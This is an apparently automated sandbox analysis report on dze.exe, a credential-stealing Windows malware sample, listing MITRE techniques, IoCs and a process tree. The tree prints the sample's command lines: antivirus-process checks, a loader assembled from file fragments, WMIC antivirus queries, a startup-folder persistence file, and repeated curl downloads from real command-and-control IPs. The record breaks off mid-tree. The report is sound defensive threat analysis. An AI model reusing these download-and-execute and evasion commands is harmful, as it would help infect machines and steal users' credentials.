ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

Resubmissions

13-11-2024 08:24

241113-kaxexs1pfm 10

12-11-2024 13:12

241112-qfr1aatclg 10

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2024 08:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dze.exe
Size

1.0MB
MD5

fc877cda1618318751789044fb01a6bd
SHA1

15f90c8f5c543964a33d62d6e68f62a6d2712262
SHA256

ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
SHA512

b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
SSDEEP

24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score

10^/10

discovery spyware stealer

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Crossword.pif

description	pid	Process	procid_target
PID 4220 created 3396	4220	Crossword.pif	56

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dze.exeCrossword.pifRevenueDevices.exeEither.pif

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	dze.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Crossword.pif
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	RevenueDevices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Either.pif

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe

Executes dropped EXE 6 IoCs

Processes:

Crossword.pifazvw.exeRevenueDevices.exeEither.pifazvw.exe7za.exe

pid	Process
4220	Crossword.pif
4028	azvw.exe
344	RevenueDevices.exe
5004	Either.pif
1688	azvw.exe
4712	7za.exe

Loads dropped DLL 1 IoCs

Processes:

Either.pif

pid	Process
5004	Either.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
3032	tasklist.exe
1388	tasklist.exe
3276	tasklist.exe
3492	tasklist.exe

Drops file in Windows directory 7 IoCs

Processes:

RevenueDevices.exedze.exe

description	ioc	Process
File opened for modification	C:\Windows\BrushSub	RevenueDevices.exe
File opened for modification	C:\Windows\McLol	RevenueDevices.exe
File opened for modification	C:\Windows\SoilOasis	dze.exe
File opened for modification	C:\Windows\RebatesPalm	dze.exe
File opened for modification	C:\Windows\DouglasWind	dze.exe
File opened for modification	C:\Windows\TmpMoon	RevenueDevices.exe
File opened for modification	C:\Windows\NotifiedAaron	RevenueDevices.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeCrossword.pifcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exefindstr.exefindstr.execmd.execmd.execmd.execmd.exereg.execmd.execmd.execmd.execmd.exechoice.execmd.execmd.exereg.execmd.execmd.exeschtasks.exereg.execmd.exechoice.exereg.execmd.exereg.execmd.execmd.execmd.exeschtasks.execmd.execmd.exereg.exeschtasks.execmd.execmd.exeEither.pifcmd.execmd.execmd.execmd.execmd.exefindstr.execmd.execmd.exefindstr.execmd.execmd.execmd.execmd.execmd.exeazvw.execmd.exedze.exesysteminfo.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crossword.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Either.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	azvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dze.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exeRobocopy.exe

pid	Process
3948	cmd.exe
4996	Robocopy.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
1856	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Crossword.pif

pid	Process
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Crossword.pif

pid	Process
4220	Crossword.pif

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exeWMIC.exetasklist.exeCrossword.piftasklist.exeRobocopy.exe7za.exe

description	pid	Process
Token: SeDebugPrivilege	3492	tasklist.exe
Token: SeDebugPrivilege	3032	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2400	WMIC.exe
Token: SeSecurityPrivilege	2400	WMIC.exe
Token: SeTakeOwnershipPrivilege	2400	WMIC.exe
Token: SeLoadDriverPrivilege	2400	WMIC.exe
Token: SeSystemProfilePrivilege	2400	WMIC.exe
Token: SeSystemtimePrivilege	2400	WMIC.exe
Token: SeProfSingleProcessPrivilege	2400	WMIC.exe
Token: SeIncBasePriorityPrivilege	2400	WMIC.exe
Token: SeCreatePagefilePrivilege	2400	WMIC.exe
Token: SeBackupPrivilege	2400	WMIC.exe
Token: SeRestorePrivilege	2400	WMIC.exe
Token: SeShutdownPrivilege	2400	WMIC.exe
Token: SeDebugPrivilege	2400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2400	WMIC.exe
Token: SeRemoteShutdownPrivilege	2400	WMIC.exe
Token: SeUndockPrivilege	2400	WMIC.exe
Token: SeManageVolumePrivilege	2400	WMIC.exe
Token: 33	2400	WMIC.exe
Token: 34	2400	WMIC.exe
Token: 35	2400	WMIC.exe
Token: 36	2400	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2400	WMIC.exe
Token: SeSecurityPrivilege	2400	WMIC.exe
Token: SeTakeOwnershipPrivilege	2400	WMIC.exe
Token: SeLoadDriverPrivilege	2400	WMIC.exe
Token: SeSystemProfilePrivilege	2400	WMIC.exe
Token: SeSystemtimePrivilege	2400	WMIC.exe
Token: SeProfSingleProcessPrivilege	2400	WMIC.exe
Token: SeIncBasePriorityPrivilege	2400	WMIC.exe
Token: SeCreatePagefilePrivilege	2400	WMIC.exe
Token: SeBackupPrivilege	2400	WMIC.exe
Token: SeRestorePrivilege	2400	WMIC.exe
Token: SeShutdownPrivilege	2400	WMIC.exe
Token: SeDebugPrivilege	2400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2400	WMIC.exe
Token: SeRemoteShutdownPrivilege	2400	WMIC.exe
Token: SeUndockPrivilege	2400	WMIC.exe
Token: SeManageVolumePrivilege	2400	WMIC.exe
Token: 33	2400	WMIC.exe
Token: 34	2400	WMIC.exe
Token: 35	2400	WMIC.exe
Token: 36	2400	WMIC.exe
Token: SeDebugPrivilege	1388	tasklist.exe
Token: 33	4220	Crossword.pif
Token: SeIncBasePriorityPrivilege	4220	Crossword.pif
Token: SeDebugPrivilege	3276	tasklist.exe
Token: 33	4220	Crossword.pif
Token: SeIncBasePriorityPrivilege	4220	Crossword.pif
Token: 33	4220	Crossword.pif
Token: SeIncBasePriorityPrivilege	4220	Crossword.pif
Token: 33	4220	Crossword.pif
Token: SeIncBasePriorityPrivilege	4220	Crossword.pif
Token: SeBackupPrivilege	4996	Robocopy.exe
Token: SeRestorePrivilege	4996	Robocopy.exe
Token: SeSecurityPrivilege	4996	Robocopy.exe
Token: SeTakeOwnershipPrivilege	4996	Robocopy.exe
Token: SeRestorePrivilege	4712	7za.exe
Token: 35	4712	7za.exe
Token: SeSecurityPrivilege	4712	7za.exe
Token: SeSecurityPrivilege	4712	7za.exe
Token: 33	4220	Crossword.pif
Token: SeIncBasePriorityPrivilege	4220	Crossword.pif

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

Crossword.pifEither.pif

pid	Process
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
5004	Either.pif
5004	Either.pif
5004	Either.pif

Suspicious use of SendNotifyMessage 6 IoCs

Processes:

Crossword.pifEither.pif

pid	Process
4220	Crossword.pif
4220	Crossword.pif
4220	Crossword.pif
5004	Either.pif
5004	Either.pif
5004	Either.pif

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Either.pif

pid	Process
5004	Either.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dze.execmd.exeCrossword.pifcmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2360 wrote to memory of 728	2360	dze.exe	85
PID 2360 wrote to memory of 728	2360	dze.exe	85
PID 2360 wrote to memory of 728	2360	dze.exe	85
PID 728 wrote to memory of 3492	728	cmd.exe	91
PID 728 wrote to memory of 3492	728	cmd.exe	91
PID 728 wrote to memory of 3492	728	cmd.exe	91
PID 728 wrote to memory of 1316	728	cmd.exe	92
PID 728 wrote to memory of 1316	728	cmd.exe	92
PID 728 wrote to memory of 1316	728	cmd.exe	92
PID 728 wrote to memory of 3032	728	cmd.exe	94
PID 728 wrote to memory of 3032	728	cmd.exe	94
PID 728 wrote to memory of 3032	728	cmd.exe	94
PID 728 wrote to memory of 2972	728	cmd.exe	95
PID 728 wrote to memory of 2972	728	cmd.exe	95
PID 728 wrote to memory of 2972	728	cmd.exe	95
PID 728 wrote to memory of 2276	728	cmd.exe	97
PID 728 wrote to memory of 2276	728	cmd.exe	97
PID 728 wrote to memory of 2276	728	cmd.exe	97
PID 728 wrote to memory of 4384	728	cmd.exe	98
PID 728 wrote to memory of 4384	728	cmd.exe	98
PID 728 wrote to memory of 4384	728	cmd.exe	98
PID 728 wrote to memory of 3088	728	cmd.exe	99
PID 728 wrote to memory of 3088	728	cmd.exe	99
PID 728 wrote to memory of 3088	728	cmd.exe	99
PID 728 wrote to memory of 4220	728	cmd.exe	100
PID 728 wrote to memory of 4220	728	cmd.exe	100
PID 728 wrote to memory of 4220	728	cmd.exe	100
PID 728 wrote to memory of 1592	728	cmd.exe	101
PID 728 wrote to memory of 1592	728	cmd.exe	101
PID 728 wrote to memory of 1592	728	cmd.exe	101
PID 4220 wrote to memory of 4448	4220	Crossword.pif	102
PID 4220 wrote to memory of 4448	4220	Crossword.pif	102
PID 4220 wrote to memory of 4448	4220	Crossword.pif	102
PID 4220 wrote to memory of 4744	4220	Crossword.pif	107
PID 4220 wrote to memory of 4744	4220	Crossword.pif	107
PID 4220 wrote to memory of 4744	4220	Crossword.pif	107
PID 4744 wrote to memory of 2400	4744	cmd.exe	109
PID 4744 wrote to memory of 2400	4744	cmd.exe	109
PID 4744 wrote to memory of 2400	4744	cmd.exe	109
PID 4220 wrote to memory of 4640	4220	Crossword.pif	110
PID 4220 wrote to memory of 4640	4220	Crossword.pif	110
PID 4220 wrote to memory of 4640	4220	Crossword.pif	110
PID 4220 wrote to memory of 64	4220	Crossword.pif	112
PID 4220 wrote to memory of 64	4220	Crossword.pif	112
PID 4220 wrote to memory of 64	4220	Crossword.pif	112
PID 64 wrote to memory of 1976	64	cmd.exe	114
PID 64 wrote to memory of 1976	64	cmd.exe	114
PID 64 wrote to memory of 1976	64	cmd.exe	114
PID 4220 wrote to memory of 4396	4220	Crossword.pif	117
PID 4220 wrote to memory of 4396	4220	Crossword.pif	117
PID 4220 wrote to memory of 4396	4220	Crossword.pif	117
PID 4396 wrote to memory of 1836	4396	cmd.exe	119
PID 4396 wrote to memory of 1836	4396	cmd.exe	119
PID 4396 wrote to memory of 1836	4396	cmd.exe	119
PID 4220 wrote to memory of 4440	4220	Crossword.pif	120
PID 4220 wrote to memory of 4440	4220	Crossword.pif	120
PID 4220 wrote to memory of 4440	4220	Crossword.pif	120
PID 4440 wrote to memory of 1020	4440	cmd.exe	122
PID 4440 wrote to memory of 1020	4440	cmd.exe	122
PID 4440 wrote to memory of 1020	4440	cmd.exe	122
PID 4220 wrote to memory of 868	4220	Crossword.pif	123
PID 4220 wrote to memory of 868	4220	Crossword.pif	123
PID 4220 wrote to memory of 868	4220	Crossword.pif	123
PID 868 wrote to memory of 1400	868	cmd.exe	125

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3396
- C:\Users\Admin\AppData\Local\Temp\dze.exe
  "C:\Users\Admin\AppData\Local\Temp\dze.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:728
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3492
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3032
  - - C:\Windows\SysWOW64\findstr.exe
      findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2972
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 226443
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "AthleticsTabletsUserImaging" Slovenia
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
      4⤵
      System Location Discovery: System Language Discovery
      PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
      Crossword.pif d
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\566 2>&1
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4744
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\566 > C:\Users\Admin\AppData\Local\temp\636
        5⤵
        
        PID:4640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rozes" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:64
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rozes" "178.215.224.252/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lugvq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4396
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lugvq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\njsoz" "178.215.224.74/v10/ukyh.php?jspo=5"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4440
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\njsoz" "178.215.224.74/v10/ukyh.php?jspo=5"
        6⤵
        
        PID:1020
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nzemp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:868
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nzemp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\suwcd" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1160
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\suwcd" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4304
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\naiae" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3404
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\naiae" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        6⤵
        
        PID:1452
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cbyhq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4712
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cbyhq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hqchy" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3060
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hqchy" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\batwb" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3944
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\batwb" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        6⤵
        
        PID:3560
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4720
      - C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o xhwq.zip
        6⤵
        Executes dropped EXE
        
        PID:4028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rwnfp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4616
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rwnfp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vuwgn" "178.215.224.74/v10/ukyh.php?jspo=31"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4640
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vuwgn" "178.215.224.74/v10/ukyh.php?jspo=31"
        6⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4868
      - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        6⤵
        System Location Discovery: System Language Discovery
        Gathers system information
        
        PID:1856
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /C:"OS Name"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4492
    - - C:\Windows\SysWOW64\cmd.exe
        
